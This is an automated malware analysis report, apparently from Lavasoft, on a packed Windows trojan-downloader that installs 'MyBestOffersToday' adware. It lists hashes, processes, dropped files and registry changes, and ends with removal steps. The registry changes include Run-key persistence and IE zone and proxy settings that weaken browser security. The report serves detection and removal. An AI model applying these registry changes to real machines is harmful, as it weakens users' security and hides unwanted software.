HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.Win32.Swrort.3.FD (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, SpyTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 97c94f7678fa89eb87858f8e5a7c13ab
SHA1: 14558f60160dbed797a212c4db37ad8a5c6859ef
SHA256: e0edf44c18eb85831920443c696c4e75c9d5c4c92d056552e8c3e6f0413c7ca0
SSDeep: 6144:6/QiQPsDJZVpdtyhvOJGYgBpl7 hCnaTxUKsE9ceJRvcj68xhxXqo7V5/q/hAUfB:CQiGs1ZVpXyVOJilKhC2Iqjzva6WXd5
Size: 385387 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The SpyTool creates the following process(es):
taskkill.exe:320
taskkill.exe:1336
taskkill.exe:2044
97c94f7678fa89eb87858f8e5a7c13ab.tmp:1680
tasklist.exe:1928
tasklist.exe:364
upmbot_ca_014010265.exe:1092
%original file name%.exe:668
mbot_ca_014010265.exe:1736
encrypt.exe:216
encrypt.exe:1260
encrypt.exe:196
encrypt.exe:264
setup.tmp:1896
setup.exe:1948
The SpyTool injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process 97c94f7678fa89eb87858f8e5a7c13ab.tmp:1680 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O9YZOXQZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KH2NKL2Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5Q3CH2Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\idp.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ODABS1EF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\setup.exe (657385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\_isetup\_shfoldr.dll (23 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\idp.dll (0 bytes)
The process upmbot_ca_014010265.exe:1092 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (231 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (182 bytes)
The process %original file name%.exe:668 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-8Q7DH.tmp\97c94f7678fa89eb87858f8e5a7c13ab.tmp (3780 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-8Q7DH.tmp\97c94f7678fa89eb87858f8e5a7c13ab.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-8Q7DH.tmp (0 bytes)
The process mbot_ca_014010265.exe:1736 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\mbot_ca_014010265\1.10\cnf.cyl (269 bytes)
The process encrypt.exe:216 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.exe (16609 bytes)
The process encrypt.exe:1260 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.exe (20237 bytes)
The process encrypt.exe:196 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.exe (16649 bytes)
The process encrypt.exe:264 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.exe (3300 bytes)
The process setup.tmp:1896 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\encrypt.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.7z (8657 bytes)
%Program Files%\mbot_ca_014010265\is-OP7DE.tmp (28787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-HE4TJ.tmp (4185 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MYBESTOFFERSTODAY\MyBestOffersToday.lnk (837 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-HT75P.tmp (7971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-LGPBB.tmp (7433 bytes)
%Program Files%\mbot_ca_014010265\unins000.dat (35465 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-61C0M.tmp (8657 bytes)
%Program Files%\mbot_ca_014010265\mbot_ca_014010265.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\idp.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\is-6DL8S.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.7z (7971 bytes)
%Program Files%\mbot_ca_014010265\mybestofferstoday_widget.exe (23404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.7z (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\ex.bat (1564 bytes)
%Program Files%\mbot_ca_014010265\predm.exe (4185 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\MYBESTOFFERSTODAY_WIDGET.7Z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mybestofferstoday_widget.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\UPMBOT_CA_014010265.7Z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\MBOT_CA_014010265.7Z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\mbot_ca_014010265.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\idp.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp (0 bytes)
The process setup.exe:1948 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-5BNLS.tmp\setup.tmp (6319 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-5BNLS.tmp\setup.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5BNLS.tmp (0 bytes)
Registry activity
The process taskkill.exe:320 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 43 41 0D 5F 0A A9 63 31 40 17 91 F8 D5 2B FF"
The process taskkill.exe:1336 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 2E 08 D3 C4 75 BB 80 AC 80 FE 84 D1 2B A2 E5"
The process taskkill.exe:2044 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 50 3F 17 6A E9 42 E2 F1 ED BE BF FB 5F DA 64"
The process 97c94f7678fa89eb87858f8e5a7c13ab.tmp:1680 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 35 00 E8 F2 D2 BC 60 D3 4B 65 FD 7D A9 CF 61"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process tasklist.exe:1928 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 9A B0 64 40 76 1C EF EE 26 7B 4E 5B C9 F1 A0"
The process tasklist.exe:364 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 79 78 1E 12 96 79 C4 05 FA 38 05 28 42 80 1B"
The process upmbot_ca_014010265.exe:1092 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "mbot_ca_014010265"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "93DCBECB-77B0-45FA-8C3B-666267523CCF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 0C 6E 09 57 E6 62 0A 4F 59 B7 EC 44 A0 A4 DE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upmbot_ca_014010265.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe -runhelper"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:668 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 27 91 7B A2 73 84 5A 7A 77 E9 3D C8 C3 3E 5A"
The process mbot_ca_014010265.exe:1736 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 10 C3 9C CF C5 D4 3D 79 BC 3D A7 30 4E 5C AF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process encrypt.exe:216 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 5E 6A F4 1E D7 95 19 E7 62 F7 A5 CF E5 CE 05"
The process encrypt.exe:1260 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 0E 08 D5 1E 2D A4 3A FA 0F 66 A2 D2 40 C8 65"
The process encrypt.exe:196 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE D0 CE 93 50 EA 39 BC 26 B3 FF 21 0A 0D 80 FA"
The process encrypt.exe:264 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 9B E5 29 0A F9 E4 BA C4 C7 82 46 75 E2 F0 59"
The process setup.tmp:1896 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Tutorials\updv]
"Version" = "16.03.12"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"NoModify" = "1"
"Inno Setup: Language" = "ca"
"Inno Setup: User" = "%CurrentUserName%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"InstallDate" = "20160312"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"DisplayName" = "MyBestOffersToday 026.014010265"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"Inno Setup: Setup Version" = "5.5.4 (a)"
"Inno Setup: Icon Group" = "MYBESTOFFERSTODAY"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\MYBESTOFFERSTODAY\mbot_ca_014010265]
"PathInstall" = "%Program Files%\mbot_ca_014010265"
[HKCU\Software\TutoTag]
"OnceInstalled" = "ca"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"UninstallString" = "%Program Files%\mbot_ca_014010265\unins000.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Tinstalls]
"20160312" = "1"
[HKCU\Software\Microsoft]
"Tinstalls" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"NoRepair" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 7B 06 24 23 BA 65 46 D7 9E DF 9C DA 1E 04 20"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"Inno Setup: App Path" = "%Program Files%\mbot_ca_014010265"
"InstallLocation" = "%Program Files%\mbot_ca_014010265\"
[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mbot_ca_014010265_is1]
"Publisher" = "MYBESTOFFERSTODAY"
"QuietUninstallString" = "%Program Files%\mbot_ca_014010265\unins000.exe /SILENT"
[HKCU\Software\TutoTag]
"OnceInstalled2" = "ca"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"mbot_ca_014010265" = "%Program Files%\mbot_ca_014010265\mbot_ca_014010265.exe"
The process setup.exe:1948 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 2A 46 F5 D3 11 B4 55 2C 0B 8B B3 A5 D1 F5 7E"
Dropped PE files
MD5 | File path |
---|---|
2fdd98650bb540f9fac1fe0a62a0b990 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.exe |
7305c34a9b7b27fe1fe64c4f2d50381e | c:\Program Files\mbot_ca_014010265\mbot_ca_014010265 - uninstall.exe |
11cd6c758e7a66bd126f2bf8658eb59b | c:\Program Files\mbot_ca_014010265\mbot_ca_014010265.exe |
989a9919e922f52086201ddfeabd3c2b | c:\Program Files\mbot_ca_014010265\mybestofferstoday_widget.exe |
3044176a198d1c94e6b18cb7ef10b302 | c:\Program Files\mbot_ca_014010265\predm.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
taskkill.exe:320
taskkill.exe:1336
taskkill.exe:2044
97c94f7678fa89eb87858f8e5a7c13ab.tmp:1680
tasklist.exe:1928
tasklist.exe:364
upmbot_ca_014010265.exe:1092
%original file name%.exe:668
mbot_ca_014010265.exe:1736
encrypt.exe:216
encrypt.exe:1260
encrypt.exe:196
encrypt.exe:264
setup.tmp:1896
setup.exe:1948 - Delete the original SpyTool file.
- Delete or disinfect the following files created/modified by the SpyTool:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O9YZOXQZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KH2NKL2Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5Q3CH2Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\idp.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ODABS1EF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\setup.exe (657385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-HE87O.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\upmbot_ca_014010265.cyl (428 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (231 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-8Q7DH.tmp\97c94f7678fa89eb87858f8e5a7c13ab.tmp (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mbot_ca_014010265\mbot_ca_014010265\1.10\cnf.cyl (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-14JSR.tmp\upmbot_ca_014010265.exe (16609 bytes)
